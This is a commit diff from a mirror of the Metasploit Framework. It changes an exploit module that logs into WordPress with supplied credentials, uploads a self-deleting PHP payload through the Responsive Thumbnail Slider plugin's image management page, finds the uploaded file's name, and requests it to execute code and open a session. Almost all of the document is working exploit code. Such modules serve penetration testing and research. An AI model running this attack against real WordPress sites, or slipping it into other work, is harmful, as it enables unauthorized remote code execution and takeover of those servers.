infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

parsing for uploaded file, gets session

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-07-26 14:23:24 -05:00
parent c23ffcbf62
commit ed4c4046ba
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 19 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb
View File

@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
[
OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin' ]),
OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ])
OptString.new('PASSWORD', [ true, "Password to authenticate with", '' ])
])
end
@ -50,9 +50,6 @@ class MetasploitModule < Msf::Exploit::Remote
# check if plugin is installed
end
# log into Wordpress
# access 'manage images' page
# upload file
def login
wp_uri = normalize_uri(target_uri.path, 'wp-login.php')
res = send_request_cgi(
@ -94,13 +91,14 @@ class MetasploitModule < Msf::Exploit::Remote
end
def upload_payload(cookies)
file_payload = get_write_exec_payload
manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'
file_payload = get_write_exec_payload(:unlink_self => true)
file_name = "#{rand_text_alpha(5)}.php"
# attempt to access plugins page
plugin_res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'),
'uri' => normalize_uri(target_uri.path, manage_uri),
'cookie' => cookies
)
@ -114,20 +112,29 @@ class MetasploitModule < Msf::Exploit::Remote
data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"")
post_data = data.to_s
# upload the file
upload_res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management&action=addedit'),
'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'),
'cookie' => cookies,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
)
#if upload_res.code == 200
# image_res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'), 'cookie' => cookies)
#end
page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)
fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/)
res = send_request_raw(
'uri' => normalize_uri(target_uri.path.to_s, 'wp-content/uploads/wp-responsive-images-thumbnail-slider/02ac868d9fce78c048b2144beaba5d5c.php'),
retrieve_file(page, cookies)
end
def retrieve_file(res, cookies)
fname = res.body.scan(/slider\/(.*\.php)/).flatten[0]
fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil?
file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
print_good("Successful upload")
execute = send_request_raw(
'uri' => file_uri,
'method' => 'GET',
'cookie' => cookies
)